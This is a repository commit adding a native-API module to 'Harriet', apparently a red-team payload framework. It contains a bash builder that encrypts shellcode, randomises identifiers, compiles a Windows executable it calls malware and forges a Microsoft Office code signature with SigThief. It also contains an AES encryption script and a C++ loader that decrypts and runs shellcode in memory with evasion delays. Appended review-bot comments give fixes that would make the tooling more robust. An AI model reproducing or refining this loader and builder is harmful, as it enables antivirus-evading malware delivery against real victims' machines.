
Add files via upload

New Module with NativeAPIs
assume-breach пре 2 година
родитељ
комит
ac010f9d68

+ 117 - 0
Harriet/Harriet/NativeAPI/NativeAPI.sh

@@ -0,0 +1,117 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+
+  ___   _____ _____   _____                            _           _  
+ / _ \ |  ___/  ___| |  ___|                          | |         | | 
+/ /_\ \| |__ \ `--.  | |__ _ __   ___ _ __ _   _ _ __ | |_ ___  __| | 
+|  _  ||  __| `--. \ |  __| '_ \ / __| '__| | | | '_ \| __/ _ \/ _` | 
+| | | || |___/\__/ / | |__| | | | (__| |  | |_| | |_) | ||  __/ (_| | 
+\_| |_/\____/\____/  \____/_| |_|\___|_|   \__, | .__/ \__\___|\__,_| 
+                                            __/ | |                   
+                                           |___/|_|                   
+ _   _       _   _              ___  ______ _____                     
+| \ | |     | | (_)            / _ \ | ___ \_   _|                    
+|  \| | __ _| |_ ___   _____  / /_\ \| |_/ / | | ___                  
+| . ` |/ _` | __| \ \ / / _ \ |  _  ||  __/  | |/ __|                 
+| |\  | (_| | |_| |\ V /  __/ | | | || |    _| |\__ \                 
+\_| \_/\__,_|\__|_| \_/ \___| \_| |_/\_|    \___/___/                 
+                                                                      
+                                                                     
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
+echo ""
+read MALWARE
+echo ""
+cp Harriet/NativeAPI/template.cpp Harriet/NativeAPI/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 Harriet/NativeAPI/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" Harriet/NativeAPI/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i Harriet/NativeAPI/Resources/template.cpp
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-8} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" Harriet/NativeAPI/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" Harriet/NativeAPI/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-19} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" Harriet/NativeAPI/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-16} | head -n 1 > shell.txt
+Random4=$(cat shell.txt)
+sed -i "s/Random4/$Random4/g" Harriet/NativeAPI/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-14} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" Harriet/NativeAPI/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" Harriet/NativeAPI/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-4} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" Harriet/NativeAPI/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-2} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" Harriet/NativeAPI/Resources/template.cpp
+
+#VIRTUALALLOC VARIABLE NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" Harriet/NativeAPI/Resources/template.cpp
+
+
+
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -o $MALWARE Harriet/NativeAPI/Resources/template.cpp -fpermissive -Wno-narrowing -O2 -O3 -Os>/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+echo ""
+sleep 2
+python3 Harriet/Resources/SigThief/sigthief.py -i Harriet/Resources/OfficeSetup.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+mv signed$MALWARE $MALWARE
+echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+echo ""
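Review bot: `rm shell*` near the end of the hunk deletes every file in the working directory whose name begins with "shell", not only the temporaries this script wrote, so a user's own `shellcode.bin` placed next to the script is removed too. Name the temporaries explicitly, `rm -f shell.txt shell2.txt shell3.txt shell5.txt`, or create them under `mktemp -d` and remove that directory at the end. `$Shellcode` on the `python3 … aesencrypt.py` line is unquoted, so a path with spaces is split into several arguments; write `"$Shellcode"`. The assignment `keys=$(cat "shell2.txt")` is overwritten two lines later without ever being read and can be dropped.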

+ 26 - 0
Harriet/Harriet/NativeAPI/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')
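Review bot: The bare `except:` around the file read catches everything, including `KeyboardInterrupt` and `SystemExit`, and reports a missing argument, a missing file and a permission error all as "File argument needed", which hides the real cause. Narrow it to `except (IndexError, OSError) as err:`, include `err` in the message, and read with `with open(sys.argv[1], "rb") as fh: plaintext = fh.read()` so the handle is closed deterministically. `sys.exit()` with no argument exits with status 0 on this error path, so a calling script cannot tell it failed; use `sys.exit(1)`. The IV on the `iv = 16 * b'\x00'` line is fixed, which under CBC means equal plaintext prefixes give equal ciphertext prefixes whenever the key repeats; that is only acceptable because `KEY` is regenerated on every run, and the dependency deserves a comment such as `# fixed IV is safe only because KEY is fresh per invocation`.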

+ 86 - 0
Harriet/Harriet/NativeAPI/Resources/template.cpp


+ 136 - 0
Harriet/Harriet/NativeAPI/template.cpp

@@ -0,0 +1,136 @@
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment (lib, "crypt32.lib")
+#pragma comment (lib, "advapi32")
+#include <psapi.h>
+#include <string.h>
+#include <tlhelp32.h>
+
+// Define the NtAllocateVirtualMemory function pointer
+typedef NTSTATUS(WINAPI* PNTALLOCATEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect
+    );
+
+// Define the NtFreeVirtualMemory function pointer
+typedef NTSTATUS(WINAPI* PNTFREEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType
+    );
+
+typedef NTSTATUS(WINAPI* PNTPROTECTVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect
+);
+
+static NTSTATUS(__stdcall *NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) = (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER)) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDelayExecution");
+
+static NTSTATUS(__stdcall *ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) = (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG)) GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetTimerResolution");
+
+
+
+static void Random4(float milliseconds) {
+    static bool once = true;
+    if (once) {
+        ULONG actualResolution;
+        ZwSetTimerResolution(1, true, &actualResolution);
+        once = false;
+    }
+
+    LARGE_INTEGER interval;
+    interval.QuadPart = -1 * (int)(milliseconds * 10000.0f);
+    NtDelayExecution(false, &interval);
+}
+
+int Random1(char * difern, unsigned int difern_len, char * key, size_t keylen) {
+        HCRYPTPROV hProv;
+        HCRYPTHASH hHash;
+        HCRYPTKEY hKey;
+
+        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
+                return -1;
+        }
+        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
+                return -1;
+        }
+        if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
+                return -1;              
+        }
+        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
+                return -1;
+        }
+        
+        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, difern, &difern_len)){
+                return -1;
+        }
+        
+        CryptReleaseContext(hProv, 0);
+        CryptDestroyHash(hHash);
+        CryptDestroyKey(hKey);
+        
+        return 0;
+}
+
+	char Random2[] = KEYVALUE
+	unsigned char Random3[] = PAYVAL
+	unsigned int Random7_len = sizeof(Random3);
+
+
+int main() {
+PNTPROTECTVIRTUALMEMORY NtProtectVirtualMemory =
+        (PNTPROTECTVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtProtectVirtualMemory");
+
+    // Load the NtAllocateVirtualMemory function from ntdll.dll
+    PNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory =
+        (PNTALLOCATEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
+    FreeConsole();
+    // Allocate Virtual Memory  
+    void* exec = NULL;
+    SIZE_T size = sizeof(Random3);
+    NTSTATUS status = NtAllocateVirtualMemory(
+        GetCurrentProcess(),
+        &exec,
+        0,
+        &size,
+        MEM_COMMIT | MEM_RESERVE,
+        PAGE_READWRITE
+    );
+
+    Random1((char *) Random3, Random7_len, Random2, sizeof(Random2));
+    
+    Random4(1500);
+    // Copy shellcode into allocated memory 
+    RtlCopyMemory(exec, Random3, sizeof(Random3));
+    Random4(1560);
+    // Change the memory protection to RX (Read and Execute)
+    DWORD oldProtect;
+    if (VirtualProtect(exec, size, PAGE_EXECUTE_READ, &oldProtect) == 0) {
+        // Handle error if needed
+        return -1;
+    }
+
+    ((void(*)())exec)();
+
+    // Execute shellcode in memory  
+    ((void(*)())exec)();
+    Random4(2540);
+    // Free the allocated memory using NtFreeVirtualMemory
+    PNTFREEVIRTUALMEMORY NtFreeVirtualMemory =
+        (PNTFREEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtFreeVirtualMemory");
+    SIZE_T regionSize = 0;
+    status = NtFreeVirtualMemory(GetCurrentProcess(), &exec, &regionSize, MEM_RELEASE);
+
+    return 0;
+}
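Review bot: `Random1` leaks CryptoAPI handles on every early-return path: once `CryptAcquireContextW` has succeeded, the `return -1` after a failed `CryptCreateHash`, `CryptHashData`, `CryptDeriveKey` or `CryptDecrypt` leaves `hProv` (and, further down, `hHash` and `hKey`) unreleased. The success path also releases them in the wrong order, calling `CryptReleaseContext(hProv, 0)` before the objects that depend on the provider are destroyed; it should be `CryptDestroyKey(hKey); CryptDestroyHash(hHash); CryptReleaseContext(hProv, 0);`, and each early exit should first destroy whatever was acquired up to that point. The file has no header comment explaining that `KEYVALUE`, `PAYVAL` and the `RandomN` identifiers are placeholders substituted by the accompanying shell script, which a reader opening this file on its own cannot tell; a short comment above the `char Random2[] = KEYVALUE` block would cover it.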
